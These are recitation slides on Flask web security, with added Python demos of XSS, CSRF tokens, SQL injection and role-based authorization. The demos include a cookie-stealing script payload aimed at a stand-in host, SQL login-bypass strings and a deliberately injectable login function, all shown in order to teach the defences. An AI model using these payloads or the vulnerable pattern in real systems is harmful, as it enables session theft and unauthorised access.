CS1520 Recitation: Security in Flask


CS1520 Recitation: Security in Flask Jeongmin Lee Slide contents based on a post by Damyan Bogoev at: https://damyanon.net/post/flask-series-security/

Plan for Today XSS (Cross Site Scripting) CSRF (Cross-Site Request Forgery) SQL Injection Authentication and Authorization



XSS Cross-Site Scripting (XSS) is an attack in which an attacker gets your website or application to deliver script of the attacker's choosing to another user's browser, where it runs with that user's privileges: it can read the page, steal the session cookie, change the user's settings or trigger downloads on the user's behalf. It is prevented by escaping output for the context it is rendered into (HTML body, attribute, URL, script) and by validating user input.

XSS Flask configures Jinja2 to auto-escape values rendered into templates whose file name ends in .html, .htm, .xml or .xhtml, and strings rendered with render_template_string: the characters & < > " and ' in a value are turned into HTML entities, so a value can never close or open a tag. http://jinja.pocoo.org/docs/dev/extensions/#autoescape-extension


XSS More considerations for securing your applications w.r.t. XSS: avoid generating HTML outside Jinja2 (string concatenation and f-strings bypass auto-escaping entirely); avoid echoing data taken from uploaded files back into pages; never wrap unverified user data in the Markup class (Markup, like the |safe filter, tells Jinja2 the value is already escaped and inserts it verbatim); always quote attribute values in your templates, because auto-escaping does not touch spaces, so an unquoted attribute such as value={{ q }} lets a value like x onmouseover=alert(1) add attributes of its own.
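An added example, not from the recitation slides or the post they are based on, that makes the escaping, Markup and attribute-quoting points above concrete without Flask or Jinja2 installed: Python's html.escape performs the same five-character escaping that Jinja2's auto-escape does, and html.parser tokenises the result the way a browser would. The two payloads, the render_* functions, the _Tokeniser class and the tags_of/attributes_of helpers are constructed for this illustration.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs, as a user could type them into a comment or search form.
COMMENT_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = 'x onmouseover=alert(1)'   # contains none of & < > " ' so escaping leaves it alone


def render_comment_escaped(body):
    """What an auto-escaping Jinja2 template does with {{ body }}:
    & < > " and ' become entities, so the browser never sees a tag."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def render_comment_unescaped(body):
    """What Markup(body) or {{ body|safe }} on untrusted data amounts to:
    the value is inserted verbatim and the browser executes it."""
    return "<p>" + body + "</p>"


def render_search_box(query, quoted):
    """Echo the query into the value attribute of an <input>.
    Both variants escape; they differ only in whether the attribute is quoted."""
    escaped = html.escape(query, quote=True)
    if quoted:
        return '<input type="text" name="q" value="' + escaped + '">'
    return '<input type="text" name="q" value=' + escaped + '>'


class _Tokeniser(HTMLParser):
    """Record the start tags a browser would create and the attributes of the first one."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.first_attrs = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if self.first_attrs is None:
            self.first_attrs = dict(attrs)


def tags_of(fragment):
    """Names of the elements the fragment creates, in document order."""
    t = _Tokeniser()
    t.feed(fragment)
    t.close()
    return t.tags


def attributes_of(fragment):
    """Attribute map of the fragment's first element."""
    t = _Tokeniser()
    t.feed(fragment)
    t.close()
    return t.first_attrs or {}


def demo():
    """The four outcomes as booleans: does the rendered fragment carry the injection?"""
    return {
        "escaped_comment_runs_script": "script" in tags_of(render_comment_escaped(COMMENT_PAYLOAD)),
        "markup_comment_runs_script": "script" in tags_of(render_comment_unescaped(COMMENT_PAYLOAD)),
        "unquoted_attr_injected": "onmouseover" in attributes_of(render_search_box(ATTRIBUTE_PAYLOAD, quoted=False)),
        "quoted_attr_injected": "onmouseover" in attributes_of(render_search_box(ATTRIBUTE_PAYLOAD, quoted=True)),
    }
```

The unquoted search box is the instructive case: the value was escaped, yet the browser still ends up with an onmouseover handler, because escaping only neutralises the five special characters and an unquoted attribute ends at the first space. Escaping is therefore necessary but not sufficient; the template must also put the value in a context where escaping covers every way out of it.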


CSRF Cross-Site Request Forgery (CSRF) is an attack in which a page controlled by the attacker makes the victim's browser send a request to your application; because the browser attaches the victim's cookies to that request automatically, it arrives carrying the victim's authentication and performs an action the victim never intended. The standard defence is a synchronizer token: generate a random string per session, keep it server-side (in Flask's signed session), put it in a hidden field of every form, and reject any POST whose hidden field does not match the stored value.

CSRF The server-side token check, and the hidden input to put in each form in your template, are in the Flask snippet at http://flask.pocoo.org/snippets/3/
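As an added example, not the snippet the slides refer to and not code from the post they are based on, here is the same synchronizer-token scheme written against plain mappings so it runs without Flask: TOKEN_KEY, csrf_token, hidden_field, csrf_check and simulate are names chosen for this illustration. In a Flask application, session would be flask.session, form would be request.form, csrf_check would be called from an @app.before_request hook that calls abort(403) when it returns False, and csrf_token would be exposed to templates through app.jinja_env.globals.

```python
import hmac
import secrets

TOKEN_KEY = "_csrf_token"   # assumed name for both the session entry and the hidden form field


def csrf_token(session):
    """Return the session's CSRF token, minting one on first use.

    `session` is any mutable mapping. In Flask it is flask.session, which is signed with
    SECRET_KEY, so a client cannot plant a token of its own choosing there.
    """
    if TOKEN_KEY not in session:
        session[TOKEN_KEY] = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
    return session[TOKEN_KEY]


def hidden_field(session):
    """The element to put inside every <form method="post">; in a Jinja2 template this
    would be <input type="hidden" name="_csrf_token" value="{{ csrf_token() }}">."""
    return '<input type="hidden" name="%s" value="%s">' % (TOKEN_KEY, csrf_token(session))


def csrf_check(method, session, form):
    """True if the request may proceed.

    Safe methods carry no token. A state-changing request must present, in its form body,
    the token stored in the session; compare_digest keeps the comparison constant-time.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True
    expected = session.get(TOKEN_KEY)
    submitted = form.get(TOKEN_KEY)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(str(expected).encode(), str(submitted).encode())


def simulate():
    """Constructed walkthrough: one legitimate post and one forged from another site."""
    session = {}                               # the victim's server-side session
    page = hidden_field(session)               # the form as rendered for the victim
    legit_form = {TOKEN_KEY: session[TOKEN_KEY], "email": "me@example.com"}
    # The attacker's page can make the victim's browser send the victim's cookies, but the
    # same-origin policy stops it reading the token out of the victim's page, so it can
    # only guess a token or omit it.
    forged_form = {TOKEN_KEY: secrets.token_urlsafe(32), "email": "attacker@example.com"}
    return {
        "legit": csrf_check("POST", session, legit_form),
        "forged": csrf_check("POST", session, forged_form),
        "missing": csrf_check("POST", session, {"email": "attacker@example.com"}),
        "get": csrf_check("GET", session, {}),
        "token_in_page": session[TOKEN_KEY] in page,
    }
```

GET is exempt only on the assumption that a GET never changes state; an endpoint that modifies data on GET is forgeable no matter what tokens the forms carry. The token is kept for the life of the session rather than discarded after each check, so a user with several tabs open does not get spurious 403s; regenerate it when the session's privilege level changes (login, logout).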



SQL Injection SQL Injection is an attack in which input supplied by the user (a form field, a URL parameter, a header) is interpreted as part of a SQL statement and executed on the database server. The injected SQL can be anything the application's database account is allowed to run: reading other users' rows, bypassing a login check, modifying or deleting data. Your application is exposed whenever it builds SQL statements dynamically, e.g. by concatenating or formatting user input into the query string.

SQL Injection SQLAlchemy (both the ORM and the Core expression language) sends user values to the database as bound parameters rather than splicing them into the SQL text, so semicolons, apostrophes and other special characters in the data are never interpreted as SQL. This holds only while the data stays out of the statement string: formatting user input into a text() clause, or into a raw string handed to execute(), is as injectable as in any other library.
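An added example, not from the recitation or the post it draws on, showing the two preceding slides in running code with Python's built-in sqlite3 driver: make_demo_db, _digest, login_vulnerable, login_safe, the two payload strings and demo are constructed for this illustration, and the in-memory users table holds invented accounts.

```python
import hashlib
import sqlite3


def _digest(password):
    # Unsalted SHA-256 keeps the example short; real credential storage needs a salted,
    # deliberately slow hash (PBKDF2, bcrypt, scrypt or Argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def make_demo_db():
    """Constructed in-memory database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)")
    conn.executemany("INSERT INTO users (email, password_hash) VALUES (?, ?)", [
        ("admin@example.com", _digest("correct horse battery staple")),
        ("bob@example.com", _digest("hunter2")),
    ])
    return conn


def login_vulnerable(conn, email, password):
    """Builds the statement by string formatting: the email becomes part of the SQL text,
    so a quote in it ends the literal and whatever follows is parsed as SQL."""
    sql = ("SELECT id, email FROM users WHERE email = '%s' AND password_hash = '%s'"
           % (email, _digest(password)))
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    """Same query with bound parameters: the driver sends the values separately from the
    statement, so a quote or comment marker in the email is only data to compare against."""
    sql = "SELECT id, email FROM users WHERE email = ? AND password_hash = ?"
    return conn.execute(sql, (email, _digest(password))).fetchone()


# Constructed payloads. The first closes the quoted string and comments out the rest of the
# WHERE clause, logging in as admin without a password; the second makes the clause true
# for every row, returning whichever user comes first.
TARGETED_PAYLOAD = "admin@example.com' --"
ANY_USER_PAYLOAD = "' OR 1=1 --"


def demo():
    """Run both login functions against both payloads and a legitimate credential."""
    conn = make_demo_db()
    return {
        "vulnerable_targeted": login_vulnerable(conn, TARGETED_PAYLOAD, "wrong"),
        "vulnerable_any": login_vulnerable(conn, ANY_USER_PAYLOAD, "wrong"),
        "safe_targeted": login_safe(conn, TARGETED_PAYLOAD, "wrong"),
        "safe_any": login_safe(conn, ANY_USER_PAYLOAD, "wrong"),
        "safe_legit": login_safe(conn, "admin@example.com", "correct horse battery staple"),
    }
```

The driver-level mechanism is the one SQLAlchemy relies on: User.query.filter_by(email=email).first(), or session.execute(text("SELECT ... WHERE email = :email"), {"email": email}), binds the value exactly as login_safe does, whereas text("... WHERE email = '%s'" % email) reintroduces login_vulnerable. Note also that sqlite3's execute() refuses a second statement in one call, so the classic "; DROP TABLE" payload fails here; on drivers and databases that allow statement batching the same formatting bug lets it through.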


Authentication and Authorization Authentication verifies the user's identity by validating their credentials (username or email plus password). Authorization verifies whether an already authenticated user is allowed to access a given resource or perform a given action.

Flask-Security works on a User and a Role data model that you define yourself through the SQLAlchemy API. Your classes inherit from Flask-Security's UserMixin and RoleMixin, which supply the methods Flask-Security and Flask-Login expect (is_active, get_id, has_role, ...).

from flask_security import RoleMixin, UserMixin
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()

# Association table for the many-to-many relationship between users and roles.
roles_users = db.Table('roles_users',
    db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
    db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))


class Role(db.Model, RoleMixin):
    id = db.Column(db.Integer(), primary_key=True)
    name = db.Column(db.String(80), unique=True)
    description = db.Column(db.String(255))

    def __init__(self, name):
        self.name = name

source: https://damyanon.net/post/flask-series-security/

class User(db.Model, UserMixin):
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(255), unique=True)
    # Holds the password hash, never the plaintext: hash it with
    # flask_security.utils.hash_password (encrypt_password in older releases)
    # before constructing the User.
    password = db.Column(db.String(255))
    active = db.Column(db.Boolean())
    roles = db.relationship('Role', secondary=roles_users,
                            backref=db.backref('users', lazy='dynamic'))

    def __init__(self, email, password, active, roles):
        self.email = email
        self.password = password
        self.active = active
        self.roles = roles

source: https://damyanon.net/post/flask-series-security/

Flask-Security The User class derives from Flask-Security's UserMixin, which extends Flask-Login's default user implementation; Role derives from RoleMixin in the same way. SQLAlchemy persists both. Current Flask-Security-Too releases additionally require a unique fs_uniquifier column on User. The following configuration wires the models into Flask-Security (and, through it, Flask-Login) by way of a datastore.

from flask_security import Security, SQLAlchemyUserDatastore


def configure_app(app):
    ...
    # Configure Security: the datastore tells Flask-Security how to load and store
    # User and Role rows; Security() registers the login/logout views and hooks.
    user_datastore = SQLAlchemyUserDatastore(db, User, Role)
    app.security = Security(app, user_datastore)
    ...

Complete explanation of Flask-Security configuration is here: https://pythonhosted.org/flask-security/configuration.html
source: https://damyanon.net/post/flask-series-security/
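An added example, not from the recitation, the post, or Flask-Security itself, that shows what the authentication and authorization steps described above do, using nothing beyond the standard library: hash_password and verify_password stand in for Flask-Security's password hashing, USERS is a constructed stand-in for the User and Role tables, ITERATIONS is an assumed work factor, and authenticate, authorize, requires_role and delete_account are names chosen for this illustration.

```python
import hashlib
import hmac
import os
from functools import wraps

ITERATIONS = 100_000   # assumed PBKDF2 work factor; raise it for production hardware


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, serialised as algorithm$iterations$salt$digest
    so the parameters travel with the hash and can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


_DUMMY_HASH = hash_password("not a real password")

# Constructed user store, the shape the User/Role models above would give you.
USERS = {
    "alice@example.com": {"password": hash_password("correct horse"), "active": True,  "roles": {"admin", "user"}},
    "bob@example.com":   {"password": hash_password("hunter2"),       "active": True,  "roles": {"user"}},
    "carol@example.com": {"password": hash_password("carol pw"),      "active": False, "roles": {"user"}},
}


def authenticate(users, email, password):
    """Authentication: the user record if the credentials are valid and the account is
    active, else None. An unknown email is still verified against a dummy hash so the
    response time does not reveal which addresses exist."""
    record = users.get(email)
    stored = record["password"] if record else _DUMMY_HASH
    ok = verify_password(password, stored)
    if not record or not ok or not record["active"]:
        return None
    return {"email": email, "roles": set(record["roles"])}


def authorize(user, role):
    """Authorization: may this already-authenticated user act in the given role?"""
    return user is not None and role in user["roles"]


def requires_role(role):
    """Decorator in the spirit of Flask-Security's roles_required: the view receives the
    current user as its first argument and is refused unless authorization passes."""
    def decorator(view):
        @wraps(view)
        def wrapped(user, *args, **kwargs):
            if not authorize(user, role):
                raise PermissionError("%s role required" % role)
            return view(user, *args, **kwargs)
        return wrapped
    return decorator


@requires_role("admin")
def delete_account(user, target_email):
    """A privileged action: only reachable after both checks have passed."""
    return "%s deleted %s" % (user["email"], target_email)
```

The two checks are deliberately separate functions: authenticate answers "who is this", authorize answers "may they do this", and a view that only performs the first (a common bug) lets any logged-in user reach admin actions. Flask-Security's login view and roles_required decorator play the same two roles against the User and Role tables.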

Questions?